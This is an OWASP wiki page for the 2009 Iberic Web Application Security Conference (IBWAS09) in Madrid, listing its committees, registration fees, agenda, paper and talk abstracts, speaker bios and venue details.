OWASP AppSec Iberia 2009

From OWASP
Revision as of 14:42, 19 December 2009 by Fabio.e.cerullo (Talk | contribs)

Jump to: navigation, search

1st. Iberic Web Application Security Conference (IBWAS09)

Ibwas09 logo.png

Escuela Universitaria de Ingeniería Técnica de Telecomunicación, Universidad Politécnica de Madrid | Registration

www.ibwas.com (official web-site)


Welcome

IBWAS09, the Iberic Web Application Security conference will be held in Madrid (Spain), on the 10th and 11th December 2009.

The conference will take place at the Escuela Universitaria de Ingeniería Técnica de Telecomunicación, Universidad Politécnica de Madrid. The location details can be found here.

Conference proceedings will be published by Springer in the Communications in Computer and Information Science (CCIS) series.

This conference aims to bring together application security experts, researchers, educators and practitioners from the industry, academia and international communities such as OWASP, in order to discuss open problems and new solutions in application security. In the context of this track academic researchers will be able to combine interesting results with the experience of practitioners and software engineers.

In addition to the technical issues of the conference programme, our website provides you with tourist information on the city of Madrid, unique for its cultural and historical richness, lovely surroundings and other nice places to visit around the city.

In this conference we will have two acclaimed keynote speakers. The first one is Bruce Schneier, an internationally renowned security technologist and author. The second is Inspector Jorge Martín from the High Tech Crime Unit of the Spanish National Police.

Who Should Attend IBWAS09:

  • Academics
  • Researchers
  • Lifelong learning educators
  • Technical staff
  • Secondary, vocational, or tertiary educators
  • Professionals from the private and public sector
  • Technologists and Scientifics
  • School counsellors, principals and teachers
  • Education policy development representatives
  • General personnel from vocational sectors
  • Student counsellors
  • Career/employment officers
  • Education advisers
  • Student Unions
  • Bridging program lecturers & support staff
  • Library personnel
  • International support and services staff
  • Open learning specialists
  • Application Developers
  • Application Testers and Quality Assurance
  • Application Project Management and Staff
  • Chief Information Officers, Chief Information Security Officers, Chief Technology Officers, Deputies, Associates and Staff
  • Chief Financial Officers, Auditors, and Staff Responsible for IT Security Oversight and Compliance
  • Security Managers and Staff
  • Executives, Managers, and Staff Responsible for IT Security Governance
  • IT Professionals Interesting in Improving IT Security

...and any person interested in Web Application and Services Security and Information Security in general.

We look forward to seeing you in Madrid!


Ibwas09-logo-main.png

Use the #ibwas09 hashtag for your tweets (What are hashtags?)

@ibwas09 Twitter Feed (follow us on Twitter!)

Organization and Program Committee

IBWAS09 Chairs and Organization

Vicente Aguilera Díaz, Internet Security Auditors, OWASP Spain, Spain
Carlos Serrão, ISCTE-IUL Instituto Universitário de Lisboa, OWASP Portugal, Portugal
Fabio Cerullo, OWASP Global Education Commitie, OWASP Ireland, Ireland

IBWAS09 Program Committee

André Zúquete, Universidade De Aveiro, Portugal
Candelaria Hernández-Goya, Universidad De La Laguna, Spain
Carlos Costa, Universidade De Aveiro, Portugal
Carlos Ribeiro, Instituto Superior Técnico, Portugal
Eduardo Neves, OWASP Education Committee, OWASP Brazil, Brazil
Francesc Rovirosa i Raduà, Universitat Oberta de Catalunya (UOC), Spain
Gonzalo Álvarez Marañón, Consejo Superior de Investigaciones Científicas (CSIC), Spain
Isaac Agudo, University of Malaga, Spain
Jaime Delgado, Universitat Politecnica De Catalunya, Spain
Javier Hernando, Universitat Politecnica De Catalunya, Spain
Javier Rodríguez Saeta, Barcelona Digital, Spain
Joaquim Castro Ferreira, Universidade de Lisboa, Portugal
Joaquim Marques, Instituto Politécnico de Castelo Branco, Portugal
Jorge Dávila Muro, Universidad Politécnica de Madrid (UPM), Spain
Jorge E. López de Vergara, Universidad Autónoma de Madrid, Spain
José Carlos Metrôlho, Instituto Politécnico de Castelo Branco, Portugal
José Luis Oliveira, Universidade De Aveiro, Portugal
Kuai Hinojosa, OWASP Global Education Committee, New York University, United States
Leonardo Chiariglione, Cedeo, Italy
Leonardo Lemes, Unisinos, Brasil
Manuel Sequeira, ISCTE-IUL Instituto Universitário de Lisboa, Portugal
Marco Vieira, Universidade de Coimbra, Portugal
Mariemma I. Yagüe, University of Málaga, Spain
Miguel Correia, Universidade de Lisboa, Portugal
Miguel Dias, Microsoft, Portugal
Nuno Neves, Universidade de Lisboa, Portugal
Osvaldo Santos, Instituto Politécnico de Castelo Branco, Portugal
Panos Kudumakis, Queen Mary University of London, United Kingdom
Paulo Sousa, Universidade de Lisboa, Portugal
Rodrigo Roman, University of Malaga, Spain
Rui Cruz, Instituto Superior Técnico, Portugal
Rui Marinheiro, ISCTE-IUL Instituto Universitário de Lisboa, Portugal
Sérgio Lopes, Universidade do Minho, Portugal
Tiejun Huang, Pekin University, China
Víctor Villagrá, Universidad Politécnica de Madrid (UPM), Spain
Vitor Filipe, Universidade de Trás-os-Montes e Alto Douro, Portugal
Vitor Santos, Microsoft, Portugal
Vitor Torres, Universitat Pompeu Fabra, Spain
Wagner Elias, OWASP Brazil Chapter Leader, Brazil

Registration

Registration is now open!

You can register here

OWASP Membership ($50 annual membership fee) gets you a discount of $50.

Early Registration
(until 30th. November)
Late Registration
(after 30th. November)
Regular 200 euros 250 euros
OWASP members 150 euros 200 euros
Students 100 euros 150 euros

Agenda/Schedule

The event agenda can also be found here

Day 1 - Dec 10th 2009
8:00 - 9:00 Registration (Welcome Desk)
9:00 - 9:30 Welcome to IBWAS’09 Conference
Vicente Aguilera (OWASP Spain), Carlos Serrão (OWASP Portugal), César Benavente Peces (UPM)
Location: Main Auditorium
9:30 - 10:30 Bruce Schneier
Keynote: The Future of the Security Industry
Location: Main Auditorium
10:30 - 11:15 OWASP 3.0 – Where are we going?
Dinis Cruz (OWASP)
Location: Main Auditorium
11:15 - 11:30 Coffee Break
11:30 - 12:30 Research Session 1 (Room 1) Industry Session 1 (Room 2)
A semantic web approach to share alerts among Security Information Management Systems
(Jorge E. López de Vergara, Víctor A. Villagrá, Pilar Holgado, Elena de Frutos, Iván Sanz)
SQL Injection - how far does the rabbit hole go?
Justin Clarke (Gotham Digital Science)
Building web application firewalls in high availability environments
(Juan Galiana Lara, Àngel Puigventós Gracia)
12:30 - 14:00 Lunch
14:00 - 15:30 Industry Session 2 (Room 1) Industry Session 3 (Room 2)
Microsoft Infosec Team: Security Tools Roadmap
Simon Roses (Microsoft)
Empirical Software Security Assurance
Dave Harper (Fortify Software)
OWASP Top 10 2009
Fabio E. Cerullo (OWASP)
The Business of Rogueware
Luis Corrons (Panda Security)
15:30 - 15:45 Coffee Break
15:45 – 17:15 Industry Session 4 (Room 1) Industry Session 5 (Room 2)
OWASP Logging Project
Marc Chisinevski (OWASP Logging Project)
Cloud Computing Security
Daniele Catteddu (ENISA)
Authentication: choosing a method that fits
Miguel Almeida
Assessing and Exploiting Web Applications with the open-source Samurai Web Testing Framework
Raul Siles (Taddong)


Day 2 - Dec 11th 2009
8:00 - 9:00 Registration (Welcome Desk)
9:00 - 9:15 OWASP Spain and Portugal – The state of the Union
Vicente Aguilera (OWASP Spain), Carlos Serrão (OWASP Portugal)
Location: Main Auditorium
9:15 - 10:15 Jorge Martín
Keynote: TBD
Location: Main Auditorium
10:15 - 10:30 Coffee Break
10:30 - 12:30 Research Session 2 (Room 1) Industry Session 6 (Room 2)
WASAT- A New Web Authorization Security Analysis Tool
(Alejandro Perez-Villegas, Carmen Torrano-Gimenez, Gonzalo Alvarez)
OWASP O2 Platform - Open Platform for Automating Application Security Knowledge and Workflows
Dinis Cruz (OWASP)
Connection String Parameter Pollution Attacks
(Chema Alonso, Manuel Fernandez, Alejandro Martin, Antonio Guzmán)
Web Applications Security Assessment in the Portuguese World Wide Web panorama
(Nuno Teodoro, Carlos Serrão)
Protection of applications at the enterprise in the real world: from audits to controls
Javier Fernández-Sanguino (Universidad Rey juan Carlos)
12:30 - 14:00 Lunch
14:00 - 14:45 Industry Session 7 (Room 1) Industry Session 8 (Room 2)
Deploying Secure Web Applications with OWASP Resources
Fabio E. Cerullo (OWASP)
Threat Risk Modelling
Martin Knobloch
14:45 - 15:00 Coffee Break
15:00 - 16:00 What Security in a Liquid Web?
Paulo Querido
Location: Main Auditorium
16:00 - 16:45 Panel Discussion
Topic: Web Application Security: What should Governments do in 2010?
Location: Main Auditorium
16:45 - 17:00 IBWAS'09 Closing
Location: Main Auditorium

Papers

Accepted Papers

A semantic web approach to share alerts among Security Information Management Systems

Jorge E. López de Vergara, Víctor A. Villagrá, Pilar Holgado, Elena de Frutos, Iván Sanz

This paper presents a semantic web-based architecture to share alerts among Security Information Management Systems (SIMS). Such architecture is useful if two or more SIMS from different domains need to know information about alerts happening in the other domains, which is useful for an early response to network incidents. For this, an ontology has been defined to describe the knowledge base of each SIMS that contains the security alerts. These knowledge bases can be queried from other SIMS, using standard semantic web protocols. Two modules have been implemented: one to insert the new security alerts in the knowledge base, and another one to query such knowledge bases. The performance of both modules has been evaluated, providing some results.

[link to presentation]

WASAT - A New Web Authorization Security Analysis Tool

Carmen Torrano-Gimenez , Alejandro Perez-Villegas and Gonzalo Alvarez

WASAT (Web Authentication Security Analysis Tool) is an intuitive and complete application designed for the assessment of the security of different web related authentication schemes, namely Basic Authentication and Forms-Based Authentication. WASAT is able to mount dictionary and brute force attacks of variable complexity against the target web site. Password files incorporate a syntax to generate different password search spaces. An important feature of this tool is that low-signature attacks can be performed in order to avoid detection by anti-brute-force mechanisms. This tool is platform-independent and multithreading too, allowing the user to take control of the program speed. WASAT provides some features not included in many of the existing similar applications and hardly any of their drawbacks, making this tool an excellent one for security analysis.

[link to presentation]

Connection String Parameter Pollution Attacks

Chema Alonso, Manuel Fernandez, Alejandro Martín and Antonio Guzmán

In 2007 the classification of the ten most critical vulnerabilities for the security of a system establishes that code injection attacks are the second type of attack behind XSS attacks. Currently the code injection attacks are placed first in this ranking. In fact Most critical attacks are those that combine XSS techniques to access systems and code injection techniques to access the information.. The potential damage associated with this type of threats, the total absence of background and the fact that the solution to mitigate this vulnerability must be implemented by systems administrators and the database vendors justify an in-depth analysis to estimate all the possible ways of implementation of this attack technique.

[link to presentation]


Web Applications Security Assessment in the Portuguese World Wide Web panorama

Nuno Teodoro, Carlos Serrão

Following the EU Information and Communication Technologies agenda, the Portuguese Government has started the creation of many applications, enabling electronic interaction between individuals, companies and the public administration – the e-Government. Due to the Internet open nature and the sensitivity of the data that those applications have to handle, it is important to ensure and assess their security. Financial institutions, such as banks, that nowadays use the WWW as a communication channel with their customers, face the same challenges. The main objective of this paper is to introduce a work that will be performed to assess the security of the financial and public administration sectors web applications. In this paper the authors provide a description of the rationale behind this work that involves the selection of a set of key financial and public administration web applications, the definition and application of a security assessment methodology, and the evaluation the assessment results.

[link to presentation]

Building web application firewalls in high availability environments

Juan Galiana Lara, Àngel Puigventós Gracia

Every day increases the number of Web applications and Web services due to migration that is occurring in this type of environments. In these scenarios, it is very common to find all types of vulnerabilities affecting web applications and traditional methods of protection at the network and transport level, not enough to mitigate them. What is more, there are also situations where the availability of information systems is vital for proper functioning. To protect our systems from these threats, we need a component acting on the layer 7 of the OSI model, which includes the HTTP protocol that allows us to analyze traffic and HTTPS that is easily scalable. To solve these problems, the paper presents the design and implementation of an Open Source application firewall, ModSecurity, emphasizing the use of the positive security model, and the deployment of high availability environments.

[link to presentation]

Speakers

Keynote Speakers

Bruce Schneier

The Future of the Security Industry Bruce Schneier is an internationally renowned security technologist and author. Described by The Economist as a "security guru," he is best known as a refreshingly candid and lucid security critic and commentator. When people want to know how security really works, they turn to Schneier.

His first bestseller, Applied Cryptography, explained how the arcane science of secret codes actually works, and was described by Wired as "the book the National Security Agency wanted never to be published." His book on computer and network security, Secrets and Lies, was called by Fortune "[a] jewel box of little surprises you can actually use." Beyond Fear tackles the problems of security from the small to the large: personal safety, crime, corporate security, national security. His current book, Schneier on Security, offers insight into everything from the risk of identity theft (vastly overrated) to the long-range security threat of unchecked presidential power and the surprisingly simple way to tamper-proof elections.

Regularly quoted in the media, he has testified on security before the United States Congress on several occasions and has written articles and op eds for many major publications, including The New York Times, The Guardian, Forbes, Wired, Nature, The Bulletin of the Atomic Scientists, The Sydney Morning Herald, The Boston Globe, The San Francisco Chronicle, and The Washington Post.

Schneier also publishes a free monthly newsletter, Crypto-Gram, with over 150,000 readers. In its ten years of regular publication, Crypto-Gram has become one of the most widely read forums for free-wheeling discussions, pointed critiques, and serious debate about security. As head curmudgeon at the table, Schneier explains, debunks, and draws lessons from security stories that make the news.

Schneier is the Chief Security Technology Officer of BT.

Jorge Martín

Jorge Martín is an inspector of the Spanish National Police, and currently the Head of the Logical Security Group from the High-Tech Crime Unit in the Comisaria General de Policía Judicial.

He his a Computer Systems Technical Engineer and since five years now dedicates himself to police investigation in the technological area, focusing his activity on crimes related to intrusions, different types of attacks, malware creation and dissemination and other related issues. He has also a large experience on the filed of computer forensics.

He has participated on different courses and conferences, both in Spain and abroad. Regularly participates on training initiatives with other law enforcement forces on different countries, several Interpol projects about technological investigation techniques and on different European Union studies on the obtaining and manipulation of digital evidences.

Panel Speakers

Justin Clarke

Title: SQL Injection - how far does the rabbit hole go?

Abstract: SQL Injection has been around for over 10 years, and yet it is still to this day not truly understood by many security professionals and developers. With the recent mass attacks against sites across the world, and well publicised data breaches with SQL Injection as a component, it has again come to the fore of vulnerabilities under the spotlight, however many consider it to only be a data access issue, or parameterized queries to be a panacea. This talk explores the deeper, darker areas of SQL Injection, hybrid attacks, SQL Injection worms, and exploiting database functionality. Explore what kinds of things we can expect in future.

Bio: Justin Clarke is a co-founder and Director at Gotham Digital Science, based in the United Kingdom. He has over twelve years of experience in assessing the security of networks, web applications, and wireless networks for large financial, retail, technology and government clients in the United States, the United Kingdom and New Zealand. Justin is the lead author and technical editor of "SQL Injection Attacks and Defense" (Syngress 2009), co-author of "Network Security Tools: Writing, Hacking, and Modifying Security Tools" (O¹Reilly 2005), and a contributing author to "Network Security Assessment: Know Your Network, 2nd Edition" (O'Reilly 2007), as well as a speaker at a number of conferences and events on security topics, including Black Hat USA, BruCON, EuSecWest, OSCON, ISACA, RSA, SANS, OWASP, and the British Computer Society. He is the author of the open source SQLBrute blind SQL injection testing tool, and is the Chapter Leader for the London chapter of OWASP.

[link to presentation]

Dinis Cruz

Title: OWASP O2 Platform - Open Platform for automating application security knowledge and workflows

Abstract: In this talk Dinis Cruz will show the OWASP O2 Platform which is an open source toolkit specifically designed for developers and security consultants to be able to perform quick, effective and thorough 'source-code-driven' application security reviews. The OWASP O2 Platform (http://www.owasp.org/index.php/OWASP_O2_Platform) consumes results from the scanning engines from Ounce Labs, Microsoft's CAT.NET tool, FindBugs, CodeCrawler and AppScan DE, and also provides limited support for Fortify and OWASP WebScarab dumps. In the past, there has been a very healthy skepticism on the usability of Source Code analysis engines to find commonly found vulnerablities in real world applications. This presentation will show that with some creative and powerful tools, it IS possible to use O2 to discover those issues. This presentation will also show O2's advanced support for Struts and Spring MVC.

Bio: Dinis Cruz is the Chief OWASP Evangelist and a Security Consultant based in London (UK) and specialized in: ASP.NET Application Security, Active Directory deployments, Application Security audits and .NET Security Curriculum Development. Since the 1.1 release of the .Net Framework, Dinis has been one of the strongest proponents of the need to write .Net applications that can be executed in secure Partially Trusted .Net environments, and has done extensive research on: Rooting the CLR, exposing the dangers of Full Trust Asp.Net Code, Type Confusion vulnerabilities in Full Trust (i.e. non verifiable) code, creating .Net Security Protection Layers and using Reflection to dynamically manipulate .Net Client applications. Dinis is the current [Owasp .Net Project] and [OWASP Autumn of Code] project's leader and the main developer of several of OWASP .Net tools ([SAM'SHE], [ANBS], [SiteGenerator], Owasp Report Generator, [Asp.Net Reflector]). Dinis is a active trainer on .Net security having written and delivered courses for IOActive, Foundstone, Intense School and KPMG . His latest course is the two day training course [Advanced Asp.Net Exploits and Countermeasures, which was delivered at the Black Hat 2006 conference and will be presented on the fortcomming [OWASP AppSec Conference] in Seattle.

link to presentation

Luis Corrons

Title: The Business of Rogueware

Abstract: The growth and complexity of the underground cybercrime economy has grown significantly over the past couple of years due to a variety of factors including the rise of social media tools, the global economic slowdown, and an increase in the total number of internet users. For the past 3 years, PandaLabs has monitored the ever-evolving cybercrime economy to discover its tactics, tools, participants, motivations and victims to understand the full extent of criminal activities and ultimately bring an end to the offenses. In October of 2008, PandaLabs published findings from a comprehensive study on the rogueware economy which concluded that the cybercriminals behind fake antivirus software applications were generating upwards of $15 million per month. In July of 2009, it released a follow-on study that proved monthly earnings had more than doubled to approximately $34 million through rougeware attacks distributed via Facebook, MySpace, Twitter, Digg and targeted Blackhat SEO. This session will reveal the latest results from PandaLabs’ ongoing study of the cybercrime economy by illustrating the latest malware strategies used by criminals, examining the changes in their attack strategies over time. The goal of this presentation is to raise the awareness of this growing underground economy.

Bio: Luis Corrons has been working for Panda Security since 1999. He started in the technical support department, helping home and corporative users with virus incidents. A year later, he joined the international technical support team assisting Panda's technical support belonging to their partners distributed over 50 countries around the world. In 2002, he became PandaLabs' director as well as malware alerts coordinator in worldwide infection situations, dealing with worm such as Klez, SQLSlammer, Sobig, Blaster. Sasser, Mydoom, etc. During this time, he has coordinated several automated projects related with malware, such as the automatic analisys and response system, and the malware automatic information system. He's a speaker in several security conferences such as RSA, Virus Bulletin, SecurityBSides, RAID, etc.

[link to presentation]

Marc Chisinevski

Title: The OWASP Logging Project

Abstract: The goals of the Logging Project are:

  • To provide tools for software developers in order to help them define and provide meaningful logs
  • To provide code audit tools to ensure that log messages are consistent and complete (content, format, timestamps)
  • To facilitate the integration of logs from different sources
  • To facilitate attack reconstruction
  • To facilitate information sharing around security events

The talk will explore these areas, as well as provide details on existing tools and on related OWASP projects. Research directions for the future will also be discussed. A teaser for the presentation (with sound) can be found here: http://animoto.com/play/zel3bnvPCde7tcqBG3e9Cw

Bio: Marc Chisinevski has worked in web application development and security since 2000. Outside his current position as security manager, he is the project lead for the OWASP Logging Project. He is a Certified Information System Security Professional (CISSP) and is active in the opensource community (Asset, inventory and risk management project at http://sourceforge.net/projects/assetmng/). Experienced in malware analysis, Marc also takes part in reverse engineering challenges (http://lists.immunitysec.com/pipermail/dailydave/2009-September/005889.html).

[link to presentation]

Simon Roses

Title: Microsoft Infosec Team: Security Tools Roadmap

Abstract: The Microsoft IT’s Information Security (InfoSec) group is responsible for information security risk management at Microsoft. We concentrate on the data protection of Microsoft assets, business and enterprise. Our mission is to enable secure and reliable business for Microsoft and its customers. We are an experienced group of IT professionals including architects, developers, program managers and managers. This talk will present different technologies developed by Infosec to protect Microsoft and released for free, such as CAT.NET, SPIDER, SDR, TAM and SRE and how they fit into SDL (Security Development Lifecycle).

Bio: Simon Roses Femerling works at ACE Services from Microsoft providing security services across Europe. Former PriceWaterhouseCoopers and @Stake. He has many years of security experience where he has authored and cooperated in several security Open Source projects and advisories as OWASP Pantera. Mr Roses is natural from Mallorca Island in the Mediterranean Sea. He holds a postgraduate in E-Commerce from Harvard University and a B.S. from Suffolk University at Boston, Massachusetts and a frequent speaker at security industry events including RSA, OWASP, DeepSec and Microsoft Security Technets.

[link to presentation]

Dave Harper

Title: Empirical Software Security Assurance

Abstract: By now everyone knows that security must be built in to software; it cannot be bolted on. For more than a decade, scientists, visionaries, and pundits have put forth a multitude of techniques and methodologies for building secure software, but there has been little to recommend one approach over another or to define the boundary between ideas that merely look good on paper and ideas that actually get results. The alchemists and wizards have put on a good show, but it's time to look at the real empirical evidence. This talk examines software security assurance as it is practiced today. We will discuss popular methodologies and then, based on in-depth interviews with leading enterprises such as Adobe, EMC, Google, Microsoft, QUALCOMM, Wells Fargo, and Depository Trust Clearing Corporation (DTCC), we present a set of benchmarks for developing and growing an enterprise-wide software security initiative, including but not limited to integration into the software development lifecycle (SDLC). While all initiatives are unique, we find that the leaders share a tremendous amount of common ground and wrestle with many of the same problems. Their lessons can be applied in order to build a new effort from scratch or to expand the reach of existing security capabilities.

Bio: David Harper is the EMEA Services Director for Foritfy Software, the market leader in the fast-growing area of Software Security Assurance (SSA). SSA gives organizations the power to ensure that their entire software portfolio -- whether develop internally or acquired through 3rd parties -- is secure and free of vulnerabilities that can be exploited by cyber attackers to steal valuable data and cause mayhem. David is responsible for helping Fortify’s European Customers establish Software Security Assurance programs to systematically reduce application risk. David has extensive experience of defining and implementing Secure Development Life-cycles, whether in response to a security breach or as part of a PCI or other compliance initiative. David has also worked as security consultant on large e-commerce web-sites. Prior to joining Fortify, David held consultancy positions at Macrovision and Entrust Technologies. David has over 20 years experience in application development and security and is a graduate of Bristol University.

[link to presentation]

Raul Siles

Title: Assessing and Exploiting Web Applications with the open-source Samurai Web Testing Framework

Abstract: The Samurai Web Testing Framework (WTF) is an open-source LiveCD focused on web application security testing. It includes an extensive collection of pre-installed and pre-configured top penetration testing and security analysis tools, becoming the perfect environment for assessing and exploiting web applications. The tools categorization guides the analyst through the web-app penetration testing methodology, from reconnaissance, to mapping, discovery and exploitation. This talk describes the actively developed Samurai WTF distribution, its tool set, including the recently created Samurai WTF Firefox add-ons collection (to convert the browser in the ultimate pentesting tool), the advanced features provided by the integration of multiple attack tools, plus the new tool update capabilities.

Bio: Raul Siles is a founder and senior security analyst with Taddong. His more than 10 years expertise performing advanced security services and solutions in various worldwide industries include security architecture design and reviews, penetration tests, incident handling, forensic analysis, security assessments, and information security research in new technologies, such as, web applications, wireless, honeynets, virtualization, and VoIP. Raul is one of the few individuals who have earned the GIAC Security Expert (GSE) designation. He is a SANS Institute author and instructor of penetration testing courses, a regular speaker at security conferences, author of security books and articles, and contributes to research and open-source projects. He loves security challenges and is member of international organizations, such as the Honeynet Project, or handler of the Internet Storm Center (ISC).

[link to presentation]

Miguel Almeida

Title: Authentication: choosing a method that fits

Abstract: Through the last five years, we, in the security field, have been witnessing an increase in the number of attacks to (web) application user's credentials, and the refinement and sophistication these attacks have been gaining. There are currently several methods and mechanisms to increase the strength of the authentication process for web applications. To improve the user authentication process, but also to improve the transaction authentication. As an example, one can think of adding one-time password tokens, or digital certificates, EMV cards, or even SMS one-time codes. However, none of these methods comes for free, nor do they provide perfect security. Also, one must consider usability penalties, mobility constraints, and, of course, the direct costs of the gadgets. Moreover, there's evidence that not all kinds of attacks can be stopped by even the most sophisticated of these methods. So, where do we stand? What should we choose? What kind of gadgets should we use for our business critical app, how much will they increase the costs and reduce the risk, and, last but not least, what kind of attacks we’ll be unable to stop anyway? This presentation will focus on ways to figure out how to evaluate the pros and cons of adding these improvements, given the current threats.

Bio: Miguel Almeida is an independent computer and network security professional. He has been testing, reviewing and advising on information security for the last ten years. His work has been focused on financial institutions and it has included engagements where, for a broad view of information security, the technical side as well as the organizational and procedural sides have been analyzed. Before becoming an independent consultant, Miguel was working with Deloitte and KPMG, where he was responsible for the information security practices in these companies. He was Senior Manager at Deloitte and, before, he was a Manager at KPMG. His academic studies include Computer Engineering at Instituto Superior Técnico and he is a Microsoft Certified Professional [on Windows security].

[link to presentation]

Daniele Catteddu

Title: Cloud Computing: Benefits, risks and recommendations for information security

Abstract: The presentation “Cloud Computing: Benefits, risks and recommendations for information security” will cover some the most relevant information security implications of cloud computing from the technical, policy and legal perspective. Information security benefit and top risks will be outlined and most importantly, concrete recommendations for how to address the risks and maximise the benefits for users will be given.

Bio: Daniele Catteddu, CISM, CISA, is an risk management expert at ENISA where is following various activities in the context of the Emerging and Future Risks programme. Recently he has also contribute in the development and testing of information security practices for SMEs. Before joining ENISA, Daniele was working as Information Security consultant mainly in the banking and financial sector. He is a speaker in various Information Security conferences and editor of the recently published report: Cloud Computing: Benefits, risks and recommendations for information security.

link to presentation

Fabio E Cerullo

Title: OWASP TOP 10 2009

Abstract: The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. The OWASP Top 10 was initially released in 2003 and minor updates were made in 2004, 2007, and this 2010 release. We encourage you to use the Top 10 to get your organization started with application security. Developers can learn from the mistakes of other organizations. Executives can start thinking about how to manage the risk that software applications create in their enterprise.

[link to presentation]

Title: Deploying Secure Web Applications with OWASP Resources

Abstract: Universities are key to making application security visible and the need to educate software developers about application security as an aspect of proper software development has never been more important. In this presentation I will share how OWASP resources can be used by universities to develop, test and deploy secure web applications. I will discuss challenges that Universities currently face integrating a pplication security best practices, describe how OWASP tools and resources are currently used at New York University to test for most common web application flaws. I will introduce projects such as the OWASP Enterprise Security API which can be used to mitigate most common flaws in web applications and share initiatives the OWASP Global Education Committee is currently working on.

[link to presentation]

Bio: Fabio E Cerullo is currently working as an IT Security Specialist of AIB Bank in Dublin, Ireland. He has obtained the Certified Information Systems Security Professional (CISSP) certification in December 2006 which he holds in good standing. Prior to joining AIB, he worked as a Security Engineer at Symantec Security Response European Headquarters. Security Response provides customers with world-class analysis and protection from viruses, blended threats, security risks and vulnerabilities. While at Symantec, he also collaborated developing traning materials and workshops for parents and teachers around Internet Safety. Before moving to Ireland, he worked in different software development and training activities with an emphasis in secure software development back in his native Argentina. He holds a Msc in Information Technology from the Catholic University of Buenos Aires, Argentina.

Paulo Querido

Title: What Security in a Liquid Web?

Abstract: What kind of security people ask -- and need -- from the distinct service providers in an ambience of liquidity, where every bit of information is available, and shared, all over the web in real time, all the time. More than issues, the cloud, the personal data, the portability and the panoplia of devices present new challenges to the developer.

Bio: Paulo Querido is a journalist and author long time focused in technology and Internet, and also a web entrepreneur and new media consultant. He lives in Portugal, but writes - and codes - everywhere there is connectivity. As a journalist, he worked for the most prestigious neswspapers in his country -- two decades for weekly Expresso and ocasionally for daily Público -- and he has published 3 books as an author, and 3 other as co-author, all internet-related. He has held several presentations, as well as TV, radio and printed interviews and appearances in the last years, about social media and mainstream media. Ask Google about him: http://s3g.me/pq

link to presentation

Martin Knobloch

Title: Thread Risk Modelling

Abstract: How secure must a application be? To take the appropriate measures we have to identify the risks first and think about the measures later. Threat risk modeling is an essential process for secure web application development. It allows organizations to determine the correct controls and to produce effective countermeasures within budget. This presentation is about how to do a Tread Risk Modelling. What is needed to start and where to go from there!

Bio: Martin Knobloch employed as Software Architect at Sogeti Nederland B.V. He is founder and chair of the taskforce Proactive Security Strategy (PaSS). The taskforce focus on application security of the whole application lifecycle. PaSS covers all expertise involved in application development, from Information Analyst's, over Architecture, Design, Developers, down to testers and application administrators . In his daily work, Martin is responsible for education in application security matters, advise and implementation of application security measures for customers. Martin is member of the PVIB.nl and OWASP.org. At OWASP he is member of the Dutch Chapter Board. Next to this he contributes to several projects as the OWASP Boot Camp, OWASP Speaker Project and is project lead of the OWASP Education Project. Furthermore, Martin is member of the OWASP Global Education Committee.

link to presentation

Javier Fernández-Sanguino

Title: Protection of applications at the enterprise in the real world: from audits to controls

Abstract: Securing application development in the enterprise world, where applications range from small in-house applications developed by a small department to large applications developed through an outsourcing company in a project spanning several years. In addition those applications that initially where not considered critical, suddenly become part of a critical process or those that were going to be used in a small and limited internal environment suddenly get promoted and published as a new service on the Internet. To get a better feeling of what works and what does not work in the harsh world outside, this talk will present examples of do's and dont's coming from real world projects attempting to protect security applications in different stages: from the introduction of technical measures to prevent abuse of Internet-facing applications to source-code driven application security testing.

Bio: Telecommunication Engineer by ETSIT-UPM, he is the sub-director of the Grupo Gesfor Sub-direction of Logical Security and a university Rey Juan Carlos associated professor. He has more than 10 years of experience in the TIC security sector where he has worked as consultant and security project manager, managing and participating in several security projects for the banking industry, industrial, Telco sectors and on several public administration offices. He is also the author of multiple written press TIC security articles (including the SIC, Seguridad, informática y Comunicaciones magazine) and a member of several open-source development groups such as Debian, and international research and standardization groups in the security field: OWASP, OVAL and the Honeynet project. He also leads and participates in the development of security tools, such as: Tiger, Nessus and Bastille.

link to presentation

Venue

IBWAS09 will be taking place at the Escuela Universitaria de Ingeniería Técnica de Telecomunicación, Universidad Politécnica de Madrid in Madrid, Spain.

Location

Carretera de Valencia, Km 7
28031 Madrid
Tlf: 91 336 78 42
Fax: 91 331 92 29

Find the location on Google Maps.

How to get there?

Car: from Autovía de Valencia A3 and from M40
Bus: Urbanos: E - 63 - 145 - 54 - 58 - 103 - 142 – 143 , Interurbanos: 311A, 313A, 331, 332A and 337
Metro: Line 1, station Sierra de Guadalupe
Train: C-1, C-2 and C-7. Line: Atocha-Alcalá de Henares. Estación de Vallecas

Hotels

Information about the conference recommended hotels can be found in here.

Sponsors

Sponsors

We are currently soliciting sponsors for the IBWAS09 Conference. Please refer to our sponsorship opportunities for details.

Slots are going fast so contact us to sponsor today!

Sponsors

Isecauditors.jpg Isc2.png Www.euitt.upm.es.png
 

Media Sponsors

Insecure.jpg Redsecuridad.jpg
 

Supported by

Fortify2.jpg Gotham.jpg Isaca.jpg
Ati.png Syngress.jpg Malmeida.png
J4m.jpg

Media

Final Press Releases

First Press Releases

IBWAS'09 references on media



Internals

OWASP AppSec Iberia 2009 Internal Affairs